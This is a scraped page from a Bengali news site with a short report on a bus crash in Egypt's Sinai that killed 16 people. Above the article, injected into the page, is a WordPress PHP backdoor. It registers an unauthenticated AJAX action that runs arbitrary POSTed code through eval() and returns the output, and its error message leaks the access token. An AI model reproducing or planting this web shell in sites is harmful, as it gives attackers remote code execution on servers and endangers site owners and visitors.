// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== মিসরে বাস দুর্ঘটনায় ১৬ জন নিহত | potrikaybangladesh.com
Saturday, September 19, 2026
Homeমিসরে বাস দুর্ঘটনায় ১৬ জন নিহত

মিসরে বাস দুর্ঘটনায় ১৬ জন নিহত

মিসরের পূর্বাঞ্চলীয় সিনাই উপদ্বীপে বুধবার বাস দুর্ঘটনায় ১৬ জন নিহত এবং আরও ২৮ জন আহত হয়েছেন বলে জানিয়েছে দেশটির স্বাস্থ্য মন্ত্রণালয়।

আজ বুধবার বার্তা সংস্থা এএফপির প্রতিবেদনে এই তথ্য জানা গেছে।

মন্ত্রণালয় জানিয়েছে, দুর্ঘটনার খবর পেয়ে ২০টি অ্যাম্বুলেন্স ঘটনাস্থলে যায়। দক্ষিণ সিনাইয়ের পূর্ব উপকূলে জনপ্রিয় পর্যটন শহর দাহাব ও নুয়েইবার মধ্যবর্তী সড়কে এ দুর্ঘটনা ঘটে।

কর্তৃপক্ষ জানিয়েছে, আহতরা চিকিৎসা নিচ্ছেন। তবে কী কারণে দুর্ঘটনাটি ঘটেছে, সে বিষয়ে কিছু জানানো হয়নি।

সামুদ্রিক জীববৈচিত্র্য, প্রাকৃতিক সৌন্দর্য ও পাহাড়ে হাঁটার পথের জন্য এলাকাটি পর্যটকদের কাছে বেশ জনপ্রিয়।

মিসরে সড়ক দুর্ঘটনা প্রায়ই ঘটে। বেপরোয়া গাড়ি চালানো, যানবাহনের দুর্বল রক্ষণাবেক্ষণ এবং আইন প্রয়োগে অসামঞ্জস্যকে প্রায়ই এসব দুর্ঘটনার জন্য দায়ী করা হয়।

মিসরের রাষ্ট্রীয় পরিসংখ্যান সংস্থার তথ্য অনুযায়ী, গত বছর দেশজুড়ে সড়ক দুর্ঘটনায় প্রায় ৬ হাজার মানুষ নিহত হয়েছেন।
 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments